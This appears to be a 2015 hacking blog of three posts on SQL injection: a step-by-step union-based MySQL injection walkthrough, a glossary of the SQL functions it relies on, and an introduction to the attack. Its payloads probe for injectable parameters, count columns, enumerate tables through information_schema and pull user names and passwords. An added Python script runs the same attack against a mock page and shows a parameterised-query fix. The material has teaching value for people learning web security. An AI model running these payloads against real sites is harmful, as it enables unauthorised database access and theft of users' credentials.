Friday, 25 December 2015

SQL INJECTION --UNION BASED MYSQL INJECTION ---

This blog is for educational purposes only. Please do not use the skills gained from this blog to harm, attack, or even test sites to which you do not have permission; it is illegal to do so. If you get caught (and mind you, you would) then don't say that you did not know. You have been specially warned.
Step 1: find a dynamic page

site.com/page.php?x=y

Step 2: append a ' to check whether the parameter is injectable

site.com/page.php?xid=76'

The website should now show some sign of an error, for example:
an SQL error, a PHP error, a custom error page, a page-not-found, a redirect, a blank page, data missing from the page, etc.

Step 3: confirm that the parameter is injectable and find the injection type
(string / integer) by appending --+ (the + decodes to a space, and MySQL only treats -- as a comment when it is followed by whitespace)

site.com/page.php?xid=76'--+

If the normal page comes back with no error, the quote we added is now inside a comment, which means the original query quoted the value: the injection type is string. Otherwise remove the ' and try again:

site.com/page.php?xid=76--+

If the normal page now opens, the value was used unquoted: the injection type is integer. If it still doesn't open, try another parameter or link.

NOTE* if the injection type is string, the payload goes after the closing quote:

site.com/page.php?xid=76' [sql injection here]--+

      if the injection type is integer, no quote is needed:

site.com/page.php?xid=76 [sql injection here]--+

Step 4: get the number of columns in the current query using ORDER BY (assuming the injection type is string)

site.com/page.php?xid=76' order by 1--+  no error
site.com/page.php?xid=76' order by 2--+  no error
site.com/page.php?xid=76' order by 3--+  no error
.
.
site.com/page.php?xid=76' order by n--+   error

this means the number of columns is n-1 (ORDER BY n fails because the query has no nth column)

Step 5: find the visible/vulnerable columns (assuming the number of columns is 4)

site.com/page.php?xid=76' union select 1,2,3,4--+

Now you should see some or all of these numbers on the page (the numbers that are shown are the columns the page renders, and they can be used to get more info). The UNION must have exactly as many columns as the original query, which is why Step 4 comes first.

NOTE* if you don't see any numbers, try putting a - sign in front of the id:

site.com/page.php?xid=-76' union select 1,2,3,4--+

A negative id matches no real row, so the page has nothing to show but the row produced by our UNION. If there are still no numbers, try another type of injection.

Step 6: get the name of the database, the version and the MySQL user (assuming columns 2 and 3 are visible)

site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+

0x3a3a is the hex encoding of '::'; writing the separator as a hex literal keeps extra quotes out of the payload.

Step 7: get the names of the tables (assuming the database name is xyz)

site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+

NOTE* if the page only displays a single row, use group_concat(table_name) instead of table_name so that all the names come back in one row

Step 8: get the names of the columns (assuming the table name is users)

site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and table_name='users'--+

Step 9: get the data (assuming the column names are user_name and user_pass)

site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+

Step 10: evil smile 3:)

     

Thursday, 24 December 2015

SQL INJECTION --- UNION BASED SQL INJECTION INTRODUCTION




A few commands that are used in union-based SQL injection ---

1.union --
       The SQL UNION operator combines the results of two or more SELECT statements into one result set, dropping duplicate rows (UNION ALL keeps them). Every SELECT in the union must return the same number of columns, which is why the column count has to be found first.

2.group_concat () --
        
     syntax --  group_concat(<column_name>)
       concatenates the values from all the rows of a column and puts them in a single row separated by ',' (the default separator). MySQL truncates the result at group_concat_max_len, 1024 bytes by default, so very long lists come back cut off.

3.information_schema ---( it is like an index)
        It is a built-in database (not a function) that stores data about data (metadata): the list of all databases, all tables, all columns, which table a column belongs to, which database a table belongs to, the data type of each column, etc.

4.database () ---
        returns the name of the database currently in use.

5.order by X --
       syntax -- order by <column no./name> 
       sorts the output of the select query in ascending order of the specified column. Giving a column number larger than the number of columns in the query is an error, which is what Step 4 of the union-based procedure relies on.

6.limit X,Y ---
       skips the first X rows and returns the next Y rows. The offset starts at 0, so limit 0,1 returns the first row and limit 1,1 the second; this is how to read rows one at a time from a page that only displays one.

7.user() ---
        returns the MySQL user name (and host) of the current connection.

8.Version() ---
        returns the version of MySQL installed.

TIPS --- useful tables inside information_schema

  • tables --- stores the information about tables (table_name, table_schema).
  • columns --- stores the information about columns (column_name, table_name, table_schema).
  • schemata --- stores the information about databases (schema_name).
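The Python script below is an added worked example, not code from the blog. It serves both the step-by-step post above (Steps 2 to 9 of the union-based procedure: ORDER BY column counting, UNION marker columns, metadata enumeration, group_concat extraction) and the command list in this post (union, group_concat, order by, limit X,Y, version()), running them against a tiny stand-in for page.php and then showing the parameterised query that closes the hole. It assumes an in-memory SQLite database rather than MySQL, so sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns, '||' for concat_ws(), and sqlite_version() for version() (SQLite has no database() or user()). The pages and users tables, their rows, and every function name are constructed for the example.

```python
import re
import sqlite3

# Added example, not code from the blog. SQLite stands in for MySQL: sqlite_master
# replaces information_schema.tables, pragma_table_info() replaces
# information_schema.columns, '||' replaces concat_ws(), sqlite_version()
# replaces version(). The tables and rows below are constructed sample data.


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        INSERT INTO pages VALUES (76, 'Welcome', 'Hello world', 'admin');
        CREATE TABLE users(id INTEGER PRIMARY KEY, user_name TEXT, user_pass TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
    """)
    return con


def vulnerable_page(con, xid):
    """Stand-in for site.com/page.php?xid=...: the parameter is pasted into the SQL
    text inside quotes (the 'string' injection type), and only columns 2 and 3 of
    the SELECT (title, body) are rendered, so those are the 'visible' columns."""
    sql = "SELECT id, title, body, author FROM pages WHERE id = '" + xid + "'"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return None  # page.php would print an SQL error: the sign looked for in Step 2
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


def count_columns(con):
    """Step 4: ORDER BY n works while n <= column count; the first n that errors gives n-1."""
    n = 1
    while vulnerable_page(con, f"76' ORDER BY {n}-- ") is not None:
        n += 1
    return n - 1


def visible_columns(con, ncols):
    """Step 5: tag each UNION column with a distinct marker and see which ones come
    back in the HTML. '-76' matches no real row, so only the UNION row renders."""
    markers = ",".join(f"'col{i}'" for i in range(1, ncols + 1))
    html = vulnerable_page(con, f"-76' UNION SELECT {markers}-- ") or ""
    return [i for i in range(1, ncols + 1) if f"col{i}" in html]


def extract(con, expr, tail=""):
    """Steps 6-9: place EXPR in visible column 2 and read it back out of the <h1>.
    TAIL is the optional FROM/WHERE/LIMIT part of the injected SELECT."""
    html = vulnerable_page(con, f"-76' UNION SELECT 1,{expr},3,4 {tail}-- ")
    return re.search(r"<h1>(.*?)</h1>", html, re.S).group(1)


def run_attack(con):
    ncols = count_columns(con)
    return {
        "ncols": ncols,
        "visible": visible_columns(con, ncols),
        # Step 6; MySQL: concat_ws(0x3a3a, database(), version(), user())
        "version": extract(con, "sqlite_version()"),
        # Step 7; MySQL: group_concat(table_name) FROM information_schema.tables WHERE table_schema='xyz'
        "tables": extract(con, "group_concat(name)", "FROM sqlite_master WHERE type='table'"),
        # Step 8; MySQL: group_concat(column_name) FROM information_schema.columns WHERE table_name='users'
        "columns_of_users": extract(con, "group_concat(name)", "FROM pragma_table_info('users')"),
        # Step 9: group_concat with a '::' separator (0x3a3a in MySQL) pulls every row at once
        "creds": extract(con, "group_concat(user_name || '::' || user_pass)", "FROM users"),
        # LIMIT X,Y alternative when the page shows one row: skip X rows, take Y.
        # LIMIT binds to the whole UNION, which is fine because '-76' contributes no row.
        "second_user": extract(con, "user_name", "FROM users LIMIT 1,1"),
    }


def safe_page(con, xid):
    """The fix: xid travels as a bound parameter and is never part of the SQL text,
    so quotes, ORDER BY and UNION inside it are just characters to compare against."""
    rows = con.execute("SELECT id, title, body, author FROM pages WHERE id = ?", (xid,)).fetchall()
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


if __name__ == "__main__":
    db = make_db()
    for key, value in run_attack(db).items():
        print(f"{key}: {value}")
    print("safe page, same payload:", repr(safe_page(db, "-76' UNION SELECT 1,2,3,4-- ")))
```

Running the script prints 4 columns, visible columns [2, 3], the two table names, the three column names of users, both credential pairs in one row, and an empty page from safe_page for the same payload. The marker strings 'col1'..'col4' replace the bare numbers 1,2,3,4 of Step 5 only because a digit such as 1 would also match the "h1" in the rendered HTML; on a real page the numbers are the quicker check.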
 

Tuesday, 22 December 2015

SQL INJECTION INTRODUCTION


  • SQL injection is one of the most common vulnerabilities on the internet.
  • It is mainly a flaw in the web application, not a database or web server issue.
  • Many programmers are still not aware of this threat.
What is SQL Injection ????
  • SQL injection is a technique that takes advantage of unvalidated input to pass SQL commands through a web application for execution by the back-end database.
  • In other words, SQL injection is a basic technique/attack used either to gain unauthorised access to a database or to retrieve information directly from the database.
SQL Injection Attacks ----
  1. Authentication Bypass --- Using this attack, an attacker logs on to an application without providing a valid username and password and gains administrative privileges.
  2. Information Disclosure --- Using this attack, an attacker obtains sensitive information that is stored in the database.
  3. Compromised Data Integrity --- An attacker uses this attack to deface a web page, insert malicious content into web pages, or alter the contents of the database.
  4. Compromised Availability of Data --- An attacker uses this attack to delete database information, or the logs or audit information that is contained in the database.
  5. Remote Code Execution --- It allows an attacker to compromise the host OS.
How a Web Application Works ----


  • The figure above shows how the initial request is triggered by the user through the browser over the Internet to the web application server.
  • The web application accesses the database servers to perform the requested task, updating and retrieving the information lying within the database.
  • The web application then presents the information to the user through the browser.
Web Security Issues ----




  • Web applications raise a number of security concerns stemming from improper coding. Serious weaknesses or vulnerabilities allow hackers to gain direct and public access to databases and to the sensitive data in them.
  • Many of these databases contain valuable information (e.g., personal and financial details), making them a frequent target of hackers.
  • Websites and related web applications must be available 24 hours a day, 7 days a week, to provide the required service to customers, employees, suppliers and other stakeholders.
  • Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be public: ports 80 and 443 remain open to allow legitimate traffic, and an attack carried inside an ordinary HTTP request on those ports is passed by the firewall, encrypted by SSL and handed to the application like any other request. Database servers (e.g. Microsoft SQL Server, Oracle and MySQL) listen on their own ports, not 80 and 443; the attacker does not need to reach them directly, because the web application's own connection to the database carries the injected query, effectively bypassing the security mechanisms of the network and the operating system.
  • Web applications often have direct access to back-end data such as customer databases and, hence, control valuable data and are much more difficult to secure. Those that do not have direct access will have some form of script that captures and transmits data. If a hacker becomes aware of weaknesses in such a script, he may easily reroute unwitting traffic to another location and illegitimately hive off personal details.
  • Most web applications are custom-made and, therefore, receive less testing than off-the-shelf software. Consequently, custom applications are more susceptible to attack.
Types of SQL Injection ---
There are mainly TWO types of SQL injection ----
1. Simple SQL Injection (the result of the query, or the error it produces, is shown in the page)
  • Union-based SQL Injection
  • Error-based SQL Injection

2. Blind SQL Injection (nothing from the query is shown; the attacker infers data from true/false differences in the page or from response time)

ok....now the types of SQL injection and the related information I will post in my next blog...so GooD ByE frds....